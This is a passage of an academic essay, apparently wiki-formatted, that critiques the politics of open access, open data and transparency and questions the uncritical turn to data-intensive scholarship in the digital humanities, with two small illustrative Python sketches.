&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding of what exactly is meant by openness – and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future – is needed than many open data/open government advocates have displayed to date. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available accords with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and came out against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even though it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al., 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competitiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need at all to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. 
In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million-plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer – but not academic researchers or the public – to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of its having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat far-fetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. 
(Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and the shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance, is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but also of a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all-pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today – and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. (Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate'] controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists had tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency] – let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall, 2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall, 2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall, 2011a: 142). To paraphrase a question from Lyotard that I will return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hillary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning WikiLeaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password-protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means that this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word ''datum'', meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented help to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010a). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided? (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? 
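&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To make the productive force of metadata a little more concrete, consider the following minimal sketch – written in Python, with entirely hypothetical records and field names, and not an account of any actual catalogue or standard. The records themselves never change; what changes is which of them a search built on a given metadata schema is able to find, select and present as ‘data’ at all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;pre&amp;gt;
# A minimal, hypothetical sketch: the same records under two metadata schemas.
records = [
    {"title": "Crime statistics 2009", "subject": "crime", "region": "London"},
    {"title": "Transport survey 2009", "topic": "transport", "area": "Manchester"},
]

def findable(items, field, value):
    # Only records whose metadata happens to use this field can ever match.
    return [r for r in items if r.get(field) == value]

print(findable(records, "subject", "crime"))      # surfaces the first record
print(findable(records, "subject", "transport"))  # surfaces nothing: the second
# record describes itself with 'topic' rather than 'subject', so a
# 'subject'-based index produces it as absent, however openly it is published.
&amp;lt;/pre&amp;gt;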
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflexivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently cited [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of their work is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2010a)? 
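&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; It is worth pausing here on just how little computational machinery a finding of this kind requires. The sketch below – again in Python, with a handful of invented title/year pairs standing in for the digitized corpus, and making no claim to reproduce Cohen and Gibbs’s actual code or data – counts the titles per year that contain a given word and reports the peak years. The counting is trivial; the open question, as Scheinfeldt concedes, is what argument the resulting numbers can be made to support. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;pre&amp;gt;
from collections import Counter

# Hypothetical stand-in for a digitized corpus of (year, book title) pairs.
titles = [
    (1790, "Reflections on the Revolution in France, Considered"),
    (1848, "The Year of Revolution"),
    (1848, "Songs of the Revolution"),
    (1851, "A Treatise on the Steam Engine"),
]

def title_spikes(corpus, word, top=3):
    # Count, per year, the titles containing the word; return the peak years.
    per_year = Counter(year for year, title in corpus
                       if word.lower() in title.lower())
    return per_year.most_common(top)

print(title_spikes(titles, "revolution"))
# e.g. [(1848, 2), (1790, 1)] - a 'spike' around 1848, produced in a few lines.
&amp;lt;/pre&amp;gt;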
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this ‘experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One consequence of this deferral, however, is that it becomes extremely difficult to judge whether the postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). It is, moreover, a form of scholarship that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and mathematics) and withdrawing support and funding from the humanities? Or is all this happening now partly because the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 